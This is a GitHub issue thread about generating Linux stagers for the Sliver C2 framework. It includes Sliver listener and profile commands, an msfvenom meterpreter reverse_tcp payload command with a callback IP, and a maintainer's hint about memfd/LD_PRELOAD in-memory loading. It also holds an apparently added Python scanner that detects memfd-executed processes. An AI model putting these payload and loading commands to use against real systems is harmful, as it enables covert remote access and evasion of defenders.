BishopFox / sliver

Adversary Emulation Framework
GNU General Public License v3.0

How to generate stager on linux? #1734

Open runt0 opened 1 month ago

runt0 commented 1 month ago

Hello: The Linux implant is about 13M; I want to generate a stager on Linux. I have read the docs and generated the stager on Windows successfully, but I don't find any info about Linux. How can I reduce the size of the payload on Linux?

info

[*] Client v1.5.42 - 85b0e870d05ec47184958dbcb871ddee2eb9e3df - linux/amd64
    Compiled at 2024-02-29 03:46:53 +0800 CST
    Compiled with go version go1.20.7 linux/amd64

[*] Server v1.5.42 - 85b0e870d05ec47184958dbcb871ddee2eb9e3df - linux/amd64
    Compiled at 2024-02-29 03:46:53 +0800 CST

command

generate stager --lhost 127.0.0.1 --lport 8443 --protocol https --save /tmp --format c --os linux

error

[!] Error: rpc error: code = Unknown desc = linux is currently not supported - Please make sure Metasploit framework >= v6.2 is installed and msfvenom/msfconsole are in your PATH

log

INFO[2024-07-04T10:07:56+08:00] [github.com/grpc-ecosystem/go-grpc-middleware@v1.4.0/logging/logrus/options.go:220] finished unary call with code OK 
ERRO[2024-07-04T10:09:04+08:00] [github.com/grpc-ecosystem/go-grpc-middleware@v1.4.0/logging/logrus/options.go:224] finished unary call with code Unknown 
ERRO[2024-07-04T10:09:57+08:00] [github.com/grpc-ecosystem/go-grpc-middleware@v1.4.0/logging/logrus/options.go:224] finished unary call with code Unknown 
ERRO[2024-07-04T10:10:41+08:00] [github.com/grpc-ecosystem/go-grpc-middleware@v1.4.0/logging/logrus/options.go:224] finished unary call with code Unknown 
ERRO[2024-07-04T10:15:14+08:00] [github.com/grpc-ecosystem/go-grpc-middleware@v1.4.0/logging/logrus/options.go:224] finished unary call with code Unknown 
ERRO[2024-07-04T10:18:50+08:00] [github.com/grpc-ecosystem/go-grpc-middleware@v1.4.0/logging/logrus/options.go:224] finished unary call with code Unknown 
INFO[2024-07-04T10:24:18+08:00] [github.com/grpc-ecosystem/go-grpc-middleware@v1.4.0/logging/logrus/options.go:220] finished unary call with code OK 
INFO[2024-07-04T10:25:49+08:00] [github.com/grpc-ecosystem/go-grpc-middleware@v1.4.0/logging/logrus/options.go:220] finished unary call with code OK 
ERRO[2024-07-04T10:29:42+08:00] [github.com/grpc-ecosystem/go-grpc-middleware@v1.4.0/logging/logrus/options.go:224] finished unary call with code Unknown 

NoPurposeInLife commented 1 month ago

Same, even after trying with

profiles new beacon --mtls 192.168.12.233:80  -o linux --arch amd64 linux64_profile

stage-listener -u tcp://0.0.0.0:443 -p linux64_profile -P
mtls -L 0.0.0.0 -l 80

And generate the stager via msfvenom

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.12.233 LPORT=443 -f elf -o met123.elf

Executing the stager results in a segmentation fault; tcpdump shows the initial connection, then it segmentation faults afterwards.

moloch-- commented 1 month ago

We don't have a shellcode/stager version in the framework for Linux. I recommend using LD_PRELOAD and memfd (there are a lot of examples online of how to do this) to load over the network directly into memory on Linux.
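
From the defender's side, the memfd-based in-memory loading mentioned above leaves a visible trace: a process whose main executable was created with memfd_create has a /proc/<pid>/exe link of the form "/memfd:<name> (deleted)" instead of a path on disk. The scanner below is an added example, not Sliver project code; it walks a /proc-style tree and flags such processes, and builds a constructed fake /proc directory so it runs offline.

```python
import os
import re
import tempfile

# A process started from a memfd shows its executable in /proc/<pid>/exe as
# "/memfd:<name> (deleted)" rather than as a filesystem path.
MEMFD_EXE = re.compile(r"^/memfd:(?P<name>.*?)(?: \(deleted\))?$")


def classify_exe_link(link):
    """Return the memfd name if the exe link points at an anonymous memfd, else None."""
    m = MEMFD_EXE.match(link)
    return m.group("name") if m else None


def scan_proc(proc_root="/proc"):
    """Walk a /proc tree and report PIDs whose main executable lives only in memory."""
    hits = []
    for entry in os.listdir(proc_root):
        if not entry.isdigit():  # skip self, sys, net, ... (only PID dirs matter)
            continue
        try:
            link = os.readlink(os.path.join(proc_root, entry, "exe"))
        except OSError:  # kernel thread, process exited, or insufficient permission
            continue
        name = classify_exe_link(link)
        if name is not None:
            hits.append({"pid": int(entry), "memfd_name": name, "exe": link})
    return hits


def build_sample_proc():
    """Constructed fake /proc tree (not real process data) for an offline demo."""
    root = tempfile.mkdtemp(prefix="fakeproc-")
    fake = {"101": "/usr/bin/bash", "202": "/memfd:payload (deleted)", "303": "/memfd:x"}
    for pid, target in fake.items():
        os.makedirs(os.path.join(root, pid))
        os.symlink(target, os.path.join(root, pid, "exe"))
    os.makedirs(os.path.join(root, "self"))  # non-numeric entries are skipped
    return root


if __name__ == "__main__":
    for hit in scan_proc(build_sample_proc()):
        print(hit)
```

Run it with the default `proc_root="/proc"` (as root, so every exe link is readable) to check a live host; a hit is a starting point for triage, not proof of malice, since some legitimate software also executes from memfds.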

NoPurposeInLife commented 1 month ago

Does this mean Sliver cannot handle Linux meterpreter shells or Linux reverse TCP shells?

rkervella commented 1 month ago

Sliver is not compatible with meterpreter's Linux stager, no.